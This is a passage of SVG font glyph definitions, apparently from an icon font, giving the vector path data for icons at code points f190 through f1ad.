<glyph unicode="&#xf190;" d="M1152 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-352v-192q0 -14 -9 -23t-23 -9q-12 0 -24 10l-319 319q-9 9 -9 23t9 23l320 320q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5v-192h352q13 0 22.5 -9.5t9.5 -22.5zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198 t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf191;" d="M1024 960v-640q0 -26 -19 -45t-45 -19q-20 0 -37 12l-448 320q-27 19 -27 52t27 52l448 320q17 12 37 12q26 0 45 -19t19 -45zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5z M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf192;" d="M1024 640q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5 t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf193;" horiz-adv-x="1664" d="M1023 349l102 -204q-58 -179 -210 -290t-339 -111q-156 0 -288.5 77.5t-210 210t-77.5 288.5q0 181 104.5 330t274.5 211l17 -131q-122 -54 -195 -165.5t-73 -244.5q0 -185 131.5 -316.5t316.5 -131.5q126 0 232.5 65t165 175.5t49.5 236.5zM1571 249l58 -114l-256 -128 q-13 -7 -29 -7q-40 0 -57 35l-239 477h-472q-24 0 -42.5 16.5t-21.5 40.5l-96 779q-2 16 6 42q14 51 57 82.5t97 31.5q66 0 113 -47t47 -113q0 -69 -52 -117.5t-120 -41.5l37 -289h423v-128h-407l16 -128h455q40 0 57 -35l228 -455z" />
<glyph unicode="&#xf194;" d="M1292 898q10 216 -161 222q-231 8 -312 -261q44 19 82 19q85 0 74 -96q-4 -57 -74 -167t-105 -110q-43 0 -82 169q-13 54 -45 255q-30 189 -160 177q-59 -7 -164 -100l-81 -72l-81 -72l52 -67q76 52 87 52q57 0 107 -179q15 -55 45 -164.5t45 -164.5q68 -179 164 -179 q157 0 383 294q220 283 226 444zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf195;" horiz-adv-x="1152" d="M1152 704q0 -191 -94.5 -353t-256.5 -256.5t-353 -94.5h-160q-14 0 -23 9t-9 23v611l-215 -66q-3 -1 -9 -1q-10 0 -19 6q-13 10 -13 26v128q0 23 23 31l233 71v93l-215 -66q-3 -1 -9 -1q-10 0 -19 6q-13 10 -13 26v128q0 23 23 31l233 71v250q0 14 9 23t23 9h160 q14 0 23 -9t9 -23v-181l375 116q15 5 28 -5t13 -26v-128q0 -23 -23 -31l-393 -121v-93l375 116q15 5 28 -5t13 -26v-128q0 -23 -23 -31l-393 -121v-487q188 13 318 151t130 328q0 14 9 23t23 9h160q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf196;" horiz-adv-x="1408" d="M1152 736v-64q0 -14 -9 -23t-23 -9h-352v-352q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v352h-352q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h352v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-352h352q14 0 23 -9t9 -23zM1280 288v832q0 66 -47 113t-113 47h-832 q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113zM1408 1120v-832q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf197;" horiz-adv-x="2176" d="M620 416q-110 -64 -268 -64h-128v64h-64q-13 0 -22.5 23.5t-9.5 56.5q0 24 7 49q-58 2 -96.5 10.5t-38.5 20.5t38.5 20.5t96.5 10.5q-7 25 -7 49q0 33 9.5 56.5t22.5 23.5h64v64h128q158 0 268 -64h1113q42 -7 106.5 -18t80.5 -14q89 -15 150 -40.5t83.5 -47.5t22.5 -40 t-22.5 -40t-83.5 -47.5t-150 -40.5q-16 -3 -80.5 -14t-106.5 -18h-1113zM1739 668q53 -36 53 -92t-53 -92l81 -30q68 48 68 122t-68 122zM625 400h1015q-217 -38 -456 -80q-57 0 -113 -24t-83 -48l-28 -24l-288 -288q-26 -26 -70.5 -45t-89.5 -19h-96l-93 464h29 q157 0 273 64zM352 816h-29l93 464h96q46 0 90 -19t70 -45l288 -288q4 -4 11 -10.5t30.5 -23t48.5 -29t61.5 -23t72.5 -10.5l456 -80h-1015q-116 64 -273 64z" />
<glyph unicode="&#xf198;" horiz-adv-x="1664" d="M1519 760q62 0 103.5 -40.5t41.5 -101.5q0 -97 -93 -130l-172 -59l56 -167q7 -21 7 -47q0 -59 -42 -102t-101 -43q-47 0 -85.5 27t-53.5 72l-55 165l-310 -106l55 -164q8 -24 8 -47q0 -59 -42 -102t-102 -43q-47 0 -85 27t-53 72l-55 163l-153 -53q-29 -9 -50 -9 q-61 0 -101.5 40t-40.5 101q0 47 27.5 85t71.5 53l156 53l-105 313l-156 -54q-26 -8 -48 -8q-60 0 -101 40.5t-41 100.5q0 47 27.5 85t71.5 53l157 53l-53 159q-8 24 -8 47q0 60 42 102.5t102 42.5q47 0 85 -27t53 -72l54 -160l310 105l-54 160q-8 24 -8 47q0 59 42.5 102 t101.5 43q47 0 85.5 -27.5t53.5 -71.5l53 -161l162 55q21 6 43 6q60 0 102.5 -39.5t42.5 -98.5q0 -45 -30 -81.5t-74 -51.5l-157 -54l105 -316l164 56q24 8 46 8zM725 498l310 105l-105 315l-310 -107z" />
<glyph unicode="&#xf199;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM1280 352v436q-31 -35 -64 -55q-34 -22 -132.5 -85t-151.5 -99q-98 -69 -164 -69v0v0q-66 0 -164 69 q-46 32 -141.5 92.5t-142.5 92.5q-12 8 -33 27t-31 27v-436q0 -40 28 -68t68 -28h832q40 0 68 28t28 68zM1280 925q0 41 -27.5 70t-68.5 29h-832q-40 0 -68 -28t-28 -68q0 -37 30.5 -76.5t67.5 -64.5q47 -32 137.5 -89t129.5 -83q3 -2 17 -11.5t21 -14t21 -13t23.5 -13 t21.5 -9.5t22.5 -7.5t20.5 -2.5t20.5 2.5t22.5 7.5t21.5 9.5t23.5 13t21 13t21 14t17 11.5l267 174q35 23 66.5 62.5t31.5 73.5z" />
<glyph unicode="&#xf19a;" horiz-adv-x="1792" d="M127 640q0 163 67 313l367 -1005q-196 95 -315 281t-119 411zM1415 679q0 -19 -2.5 -38.5t-10 -49.5t-11.5 -44t-17.5 -59t-17.5 -58l-76 -256l-278 826q46 3 88 8q19 2 26 18.5t-2.5 31t-28.5 13.5l-205 -10q-75 1 -202 10q-12 1 -20.5 -5t-11.5 -15t-1.5 -18.5t9 -16.5 t19.5 -8l80 -8l120 -328l-168 -504l-280 832q46 3 88 8q19 2 26 18.5t-2.5 31t-28.5 13.5l-205 -10q-7 0 -23 0.5t-26 0.5q105 160 274.5 253.5t367.5 93.5q147 0 280.5 -53t238.5 -149h-10q-55 0 -92 -40.5t-37 -95.5q0 -12 2 -24t4 -21.5t8 -23t9 -21t12 -22.5t12.5 -21 t14.5 -24t14 -23q63 -107 63 -212zM909 573l237 -647q1 -6 5 -11q-126 -44 -255 -44q-112 0 -217 32zM1570 1009q95 -174 95 -369q0 -209 -104 -385.5t-279 -278.5l235 678q59 169 59 276q0 42 -6 79zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286 t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM896 -215q173 0 331.5 68t273 182.5t182.5 273t68 331.5t-68 331.5t-182.5 273t-273 182.5t-331.5 68t-331.5 -68t-273 -182.5t-182.5 -273t-68 -331.5t68 -331.5t182.5 -273 t273 -182.5t331.5 -68z" />
<glyph unicode="&#xf19b;" horiz-adv-x="1792" d="M1086 1536v-1536l-272 -128q-228 20 -414 102t-293 208.5t-107 272.5q0 140 100.5 263.5t275 205.5t391.5 108v-172q-217 -38 -356.5 -150t-139.5 -255q0 -152 154.5 -267t388.5 -145v1360zM1755 954l37 -390l-525 114l147 83q-119 70 -280 99v172q277 -33 481 -157z" />
<glyph unicode="&#xf19c;" horiz-adv-x="2048" d="M960 1536l960 -384v-128h-128q0 -26 -20.5 -45t-48.5 -19h-1526q-28 0 -48.5 19t-20.5 45h-128v128zM256 896h256v-768h128v768h256v-768h128v768h256v-768h128v768h256v-768h59q28 0 48.5 -19t20.5 -45v-64h-1664v64q0 26 20.5 45t48.5 19h59v768zM1851 -64 q28 0 48.5 -19t20.5 -45v-128h-1920v128q0 26 20.5 45t48.5 19h1782z" />
<glyph unicode="&#xf19d;" horiz-adv-x="2304" d="M1774 700l18 -316q4 -69 -82 -128t-235 -93.5t-323 -34.5t-323 34.5t-235 93.5t-82 128l18 316l574 -181q22 -7 48 -7t48 7zM2304 1024q0 -23 -22 -31l-1120 -352q-4 -1 -10 -1t-10 1l-652 206q-43 -34 -71 -111.5t-34 -178.5q63 -36 63 -109q0 -69 -58 -107l58 -433 q2 -14 -8 -25q-9 -11 -24 -11h-192q-15 0 -24 11q-10 11 -8 25l58 433q-58 38 -58 107q0 73 65 111q11 207 98 330l-333 104q-22 8 -22 31t22 31l1120 352q4 1 10 1t10 -1l1120 -352q22 -8 22 -31z" />
<glyph unicode="&#xf19e;" d="M859 579l13 -707q-62 11 -105 11q-41 0 -105 -11l13 707q-40 69 -168.5 295.5t-216.5 374.5t-181 287q58 -15 108 -15q43 0 111 15q63 -111 133.5 -229.5t167 -276.5t138.5 -227q37 61 109.5 177.5t117.5 190t105 176t107 189.5q54 -14 107 -14q56 0 114 14v0 q-28 -39 -60 -88.5t-49.5 -78.5t-56.5 -96t-49 -84q-146 -248 -353 -610z" />
<glyph unicode="&#xf1a0;" d="M768 750h725q12 -67 12 -128q0 -217 -91 -387.5t-259.5 -266.5t-386.5 -96q-157 0 -299 60.5t-245 163.5t-163.5 245t-60.5 299t60.5 299t163.5 245t245 163.5t299 60.5q300 0 515 -201l-209 -201q-123 119 -306 119q-129 0 -238.5 -65t-173.5 -176.5t-64 -243.5 t64 -243.5t173.5 -176.5t238.5 -65q87 0 160 24t120 60t82 82t51.5 87t22.5 78h-436v264z" />
<glyph unicode="&#xf1a1;" horiz-adv-x="1792" d="M1095 369q16 -16 0 -31q-62 -62 -199 -62t-199 62q-16 15 0 31q6 6 15 6t15 -6q48 -49 169 -49q120 0 169 49q6 6 15 6t15 -6zM788 550q0 -37 -26 -63t-63 -26t-63.5 26t-26.5 63q0 38 26.5 64t63.5 26t63 -26.5t26 -63.5zM1183 550q0 -37 -26.5 -63t-63.5 -26t-63 26 t-26 63t26 63.5t63 26.5t63.5 -26t26.5 -64zM1434 670q0 49 -35 84t-85 35t-86 -36q-130 90 -311 96l63 283l200 -45q0 -37 26 -63t63 -26t63.5 26.5t26.5 63.5t-26.5 63.5t-63.5 26.5q-54 0 -80 -50l-221 49q-19 5 -25 -16l-69 -312q-180 -7 -309 -97q-35 37 -87 37 q-50 0 -85 -35t-35 -84q0 -35 18.5 -64t49.5 -44q-6 -27 -6 -56q0 -142 140 -243t337 -101q198 0 338 101t140 243q0 32 -7 57q30 15 48 43.5t18 63.5zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191 t348 71t348 -71t286 -191t191 -286t71 -348z" />
<glyph unicode="&#xf1a2;" d="M939 407q13 -13 0 -26q-53 -53 -171 -53t-171 53q-13 13 0 26q5 6 13 6t13 -6q42 -42 145 -42t145 42q5 6 13 6t13 -6zM676 563q0 -31 -23 -54t-54 -23t-54 23t-23 54q0 32 22.5 54.5t54.5 22.5t54.5 -22.5t22.5 -54.5zM1014 563q0 -31 -23 -54t-54 -23t-54 23t-23 54 q0 32 22.5 54.5t54.5 22.5t54.5 -22.5t22.5 -54.5zM1229 666q0 42 -30 72t-73 30q-42 0 -73 -31q-113 78 -267 82l54 243l171 -39q1 -32 23.5 -54t53.5 -22q32 0 54.5 22.5t22.5 54.5t-22.5 54.5t-54.5 22.5q-48 0 -69 -43l-189 42q-17 5 -21 -13l-60 -268q-154 -6 -265 -83 q-30 32 -74 32q-43 0 -73 -30t-30 -72q0 -30 16 -55t42 -38q-5 -25 -5 -48q0 -122 120 -208.5t289 -86.5q170 0 290 86.5t120 208.5q0 25 -6 49q25 13 40.5 37.5t15.5 54.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960 q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf1a3;" d="M866 697l90 27v62q0 79 -58 135t-138 56t-138 -55.5t-58 -134.5v-283q0 -20 -14 -33.5t-33 -13.5t-32.5 13.5t-13.5 33.5v120h-151v-122q0 -82 57.5 -139t139.5 -57q81 0 138.5 56.5t57.5 136.5v280q0 19 13.5 33t33.5 14q19 0 32.5 -14t13.5 -33v-54zM1199 502v122h-150 v-126q0 -20 -13.5 -33.5t-33.5 -13.5q-19 0 -32.5 14t-13.5 33v123l-90 -26l-60 28v-123q0 -80 58 -137t139 -57t138.5 57t57.5 139zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103 t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf1a4;" horiz-adv-x="1920" d="M1062 824v118q0 42 -30 72t-72 30t-72 -30t-30 -72v-612q0 -175 -126 -299t-303 -124q-178 0 -303.5 125.5t-125.5 303.5v266h328v-262q0 -43 30 -72.5t72 -29.5t72 29.5t30 72.5v620q0 171 126.5 292t301.5 121q176 0 302 -122t126 -294v-136l-195 -58zM1592 602h328 v-266q0 -178 -125.5 -303.5t-303.5 -125.5q-177 0 -303 124.5t-126 300.5v268l131 -61l195 58v-270q0 -42 30 -71.5t72 -29.5t72 29.5t30 71.5v275z" />
<glyph unicode="&#xf1a5;" d="M1472 160v480h-704v704h-480q-93 0 -158.5 -65.5t-65.5 -158.5v-480h704v-704h480q93 0 158.5 65.5t65.5 158.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5 t84.5 -203.5z" />
<glyph unicode="&#xf1a6;" horiz-adv-x="2048" d="M328 1254h204v-983h-532v697h328v286zM328 435v369h-123v-369h123zM614 968v-697h205v697h-205zM614 1254v-204h205v204h-205zM901 968h533v-942h-533v163h328v82h-328v697zM1229 435v369h-123v-369h123zM1516 968h532v-942h-532v163h327v82h-327v697zM1843 435v369h-123 v-369h123z" />
<glyph unicode="&#xf1a7;" d="M1046 516q0 -64 -38 -109t-91 -45q-43 0 -70 15v277q28 17 70 17q53 0 91 -45.5t38 -109.5zM703 944q0 -64 -38 -109.5t-91 -45.5q-43 0 -70 15v277q28 17 70 17q53 0 91 -45t38 -109zM1265 513q0 134 -88 229t-213 95q-20 0 -39 -3q-23 -78 -78 -136q-87 -95 -211 -101 v-636l211 41v206q51 -19 117 -19q125 0 213 95t88 229zM922 940q0 134 -88.5 229t-213.5 95q-74 0 -141 -36h-186v-840l211 41v206q55 -19 116 -19q125 0 213.5 95t88.5 229zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960 q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf1a8;" horiz-adv-x="2038" d="M1222 607q75 3 143.5 -20.5t118 -58.5t101 -94.5t84 -108t75.5 -120.5q33 -56 78.5 -109t75.5 -80.5t99 -88.5q-48 -30 -108.5 -57.5t-138.5 -59t-114 -47.5q-44 37 -74 115t-43.5 164.5t-33 180.5t-42.5 168.5t-72.5 123t-122.5 48.5l-10 -2l-6 -4q4 -5 13 -14 q6 -5 28 -23.5t25.5 -22t19 -18t18 -20.5t11.5 -21t10.5 -27.5t4.5 -31t4 -40.5l1 -33q1 -26 -2.5 -57.5t-7.5 -52t-12.5 -58.5t-11.5 -53q-35 1 -101 -9.5t-98 -10.5q-39 0 -72 10q-2 16 -2 47q0 74 3 96q2 13 31.5 41.5t57 59t26.5 51.5q-24 2 -43 -24 q-36 -53 -111.5 -99.5t-136.5 -46.5q-25 0 -75.5 63t-106.5 139.5t-84 96.5q-6 4 -27 30q-482 -112 -513 -112q-16 0 -28 11t-12 27q0 15 8.5 26.5t22.5 14.5l486 106q-8 14 -8 25t5.5 17.5t16 11.5t20 7t23 4.5t18.5 4.5q4 1 15.5 7.5t17.5 6.5q15 0 28 -16t20 -33 q163 37 172 37q17 0 29.5 -11t12.5 -28q0 -15 -8.5 -26t-23.5 -14l-182 -40l-1 -16q-1 -26 81.5 -117.5t104.5 -91.5q47 0 119 80t72 129q0 36 -23.5 53t-51 18.5t-51 11.5t-23.5 34q0 16 10 34l-68 19q43 44 43 117q0 26 -5 58q82 16 144 16q44 0 71.5 -1.5t48.5 -8.5 t31 -13.5t20.5 -24.5t15.5 -33.5t17 -47.5t24 -60l50 25q-3 -40 -23 -60t-42.5 -21t-40 -6.5t-16.5 -20.5zM1282 842q-5 5 -13.5 15.5t-12 14.5t-10.5 11.5t-10 10.5l-8 8t-8.5 7.5t-8 5t-8.5 4.5q-7 3 -14.5 5t-20.5 2.5t-22 0.5h-32.5h-37.5q-126 0 -217 -43 q16 30 36 46.5t54 29.5t65.5 36t46 36.5t50 55t43.5 50.5q12 -9 28 -31.5t32 -36.5t38 -13l12 1v-76l22 -1q247 95 371 190q28 21 50 39t42.5 37.5t33 31t29.5 34t24 31t24.5 37t23 38t27 47.5t29.5 53l7 9q-2 -53 -43 -139q-79 -165 -205 -264t-306 -142q-14 -3 -42 -7.5 t-50 -9.5t-39 -14q3 -19 24.5 -46t21.5 -34q0 -11 -26 -30zM1061 -79q39 26 131.5 47.5t146.5 21.5q9 0 22.5 -15.5t28 -42.5t26 -50t24 -51t14.5 -33q-121 -45 -244 -45q-61 0 -125 11zM822 568l48 12l109 -177l-73 -48zM1323 51q3 -15 3 -16q0 -7 -17.5 -14.5t-46 -13 t-54 -9.5t-53.5 -7.5t-32 -4.5l-7 43q21 2 60.5 8.5t72 10t60.5 3.5h14zM866 679l-96 -20l-6 17q10 1 32.5 7t34.5 6q19 0 35 -10zM1061 45h31l10 -83l-41 -12v95zM1950 1535v1v-1zM1950 1535l-1 -5l-2 -2l1 3zM1950 1535l1 1z" />
<glyph unicode="&#xf1a9;" d="M1167 -50q-5 19 -24 5q-30 -22 -87 -39t-131 -17q-129 0 -193 49q-5 4 -13 4q-11 0 -26 -12q-7 -6 -7.5 -16t7.5 -20q34 -32 87.5 -46t102.5 -12.5t99 4.5q41 4 84.5 20.5t65 30t28.5 20.5q12 12 7 29zM1128 65q-19 47 -39 61q-23 15 -76 15q-47 0 -71 -10 q-29 -12 -78 -56q-26 -24 -12 -44q9 -8 17.5 -4.5t31.5 23.5q3 2 10.5 8.5t10.5 8.5t10 7t11.5 7t12.5 5t15 4.5t16.5 2.5t20.5 1q27 0 44.5 -7.5t23 -14.5t13.5 -22q10 -17 12.5 -20t12.5 1q23 12 14 34zM1483 346q0 22 -5 44.5t-16.5 45t-34 36.5t-52.5 14 q-33 0 -97 -41.5t-129 -83.5t-101 -42q-27 -1 -63.5 19t-76 49t-83.5 58t-100 49t-111 19q-115 -1 -197 -78.5t-84 -178.5q-2 -112 74 -164q29 -20 62.5 -28.5t103.5 -8.5q57 0 132 32.5t134 71t120 70.5t93 31q26 -1 65 -31.5t71.5 -67t68 -67.5t55.5 -32q35 -3 58.5 14 t55.5 63q28 41 42.5 101t14.5 106zM1536 506q0 -164 -62 -304.5t-166 -236t-242.5 -149.5t-290.5 -54t-293 57.5t-247.5 157t-170.5 241.5t-64 302q0 89 19.5 172.5t49 145.5t70.5 118.5t78.5 94t78.5 69.5t64.5 46.5t42.5 24.5q14 8 51 26.5t54.5 28.5t48 30t60.5 44 q36 28 58 72.5t30 125.5q129 -155 186 -193q44 -29 130 -68t129 -66q21 -13 39 -25t60.5 -46.5t76 -70.5t75 -95t69 -122t47 -148.5t19.5 -177.5z" />
<glyph unicode="&#xf1aa;" d="M1070 463l-160 -160l-151 -152l-30 -30q-65 -64 -151.5 -87t-171.5 -2q-16 -70 -72 -115t-129 -45q-85 0 -145 60.5t-60 145.5q0 72 44.5 128t113.5 72q-22 86 1 173t88 152l12 12l151 -152l-11 -11q-37 -37 -37 -89t37 -90q37 -37 89 -37t89 37l30 30l151 152l161 160z M729 1145l12 -12l-152 -152l-12 12q-37 37 -89 37t-89 -37t-37 -89.5t37 -89.5l29 -29l152 -152l160 -160l-151 -152l-161 160l-151 152l-30 30q-68 67 -90 159.5t5 179.5q-70 15 -115 71t-45 129q0 85 60 145.5t145 60.5q76 0 133.5 -49t69.5 -123q84 20 169.5 -3.5 t149.5 -87.5zM1536 78q0 -85 -60 -145.5t-145 -60.5q-74 0 -131 47t-71 118q-86 -28 -179.5 -6t-161.5 90l-11 12l151 152l12 -12q37 -37 89 -37t89 37t37 89t-37 89l-30 30l-152 152l-160 160l152 152l160 -160l152 -152l29 -30q64 -64 87.5 -150.5t2.5 -171.5 q76 -11 126.5 -68.5t50.5 -134.5zM1534 1202q0 -77 -51 -135t-127 -69q26 -85 3 -176.5t-90 -158.5l-12 -12l-151 152l12 12q37 37 37 89t-37 89t-89 37t-89 -37l-30 -30l-152 -152l-160 -160l-152 152l161 160l152 152l29 30q67 67 159 89.5t178 -3.5q11 75 68.5 126 t135.5 51q85 0 145 -60.5t60 -145.5z" />
<glyph unicode="&#xf1ab;" d="M654 458q-1 -3 -12.5 0.5t-31.5 11.5l-20 9q-44 20 -87 49q-7 5 -41 31.5t-38 28.5q-67 -103 -134 -181q-81 -95 -105 -110q-4 -2 -19.5 -4t-18.5 0q6 4 82 92q21 24 85.5 115t78.5 118q17 30 51 98.5t36 77.5q-8 1 -110 -33q-8 -2 -27.5 -7.5t-34.5 -9.5t-17 -5 q-2 -2 -2 -10.5t-1 -9.5q-5 -10 -31 -15q-23 -7 -47 0q-18 4 -28 21q-4 6 -5 23q6 2 24.5 5t29.5 6q58 16 105 32q100 35 102 35q10 2 43 19.5t44 21.5q9 3 21.5 8t14.5 5.5t6 -0.5q2 -12 -1 -33q0 -2 -12.5 -27t-26.5 -53.5t-17 -33.5q-25 -50 -77 -131l64 -28 q12 -6 74.5 -32t67.5 -28q4 -1 10.5 -25.5t4.5 -30.5zM449 944q3 -15 -4 -28q-12 -23 -50 -38q-30 -12 -60 -12q-26 3 -49 26q-14 15 -18 41l1 3q3 -3 19.5 -5t26.5 0t58 16q36 12 55 14q17 0 21 -17zM1147 815l63 -227l-139 42zM39 15l694 232v1032l-694 -233v-1031z M1280 332l102 -31l-181 657l-100 31l-216 -536l102 -31l45 110l211 -65zM777 1294l573 -184v380zM1088 -29l158 -13l-54 -160l-40 66q-130 -83 -276 -108q-58 -12 -91 -12h-84q-79 0 -199.5 39t-183.5 85q-8 7 -8 16q0 8 5 13.5t13 5.5q4 0 18 -7.5t30.5 -16.5t20.5 -11 q73 -37 159.5 -61.5t157.5 -24.5q95 0 167 14.5t157 50.5q15 7 30.5 15.5t34 19t28.5 16.5zM1536 1050v-1079l-774 246q-14 -6 -375 -127.5t-368 -121.5q-13 0 -18 13q0 1 -1 3v1078q3 9 4 10q5 6 20 11q106 35 149 50v384l558 -198q2 0 160.5 55t316 108.5t161.5 53.5 q20 0 20 -21v-418z" />
<glyph unicode="&#xf1ac;" horiz-adv-x="1792" d="M288 1152q66 0 113 -47t47 -113v-1088q0 -66 -47 -113t-113 -47h-128q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h128zM1664 989q58 -34 93 -93t35 -128v-768q0 -106 -75 -181t-181 -75h-864q-66 0 -113 47t-47 113v1536q0 40 28 68t68 28h672q40 0 88 -20t76 -48 l152 -152q28 -28 48 -76t20 -88v-163zM928 0v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM928 256v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM928 512v128q0 14 -9 23 t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1184 0v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1184 256v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128 q14 0 23 9t9 23zM1184 512v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1440 0v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1440 256v128q0 14 -9 23t-23 9h-128 q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1440 512v128q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h128q14 0 23 9t9 23zM1536 896v256h-160q-40 0 -68 28t-28 68v160h-640v-512h896z" />
<glyph unicode="&#xf1ad;" d="M1344 1536q26 0 45 -19t19 -45v-1664q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1664q0 26 19 45t45 19h1280zM512 1248v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM512 992v-64q0 -14 9 -23t23 -9h64q14 0 23 9 t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM512 736v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM512 480v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM384 160v64 q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM384 416v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM384 672v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64 q14 0 23 9t9 23zM384 928v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM384 1184v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 -96v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9 t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM896 416v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 672v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 928v64 q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM896 1184v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 160v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64 q14 0 23 9t9 23zM1152 416v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 672v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 928v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9 t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1152 1184v64q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h64q14 0 23 9t9 23z" />
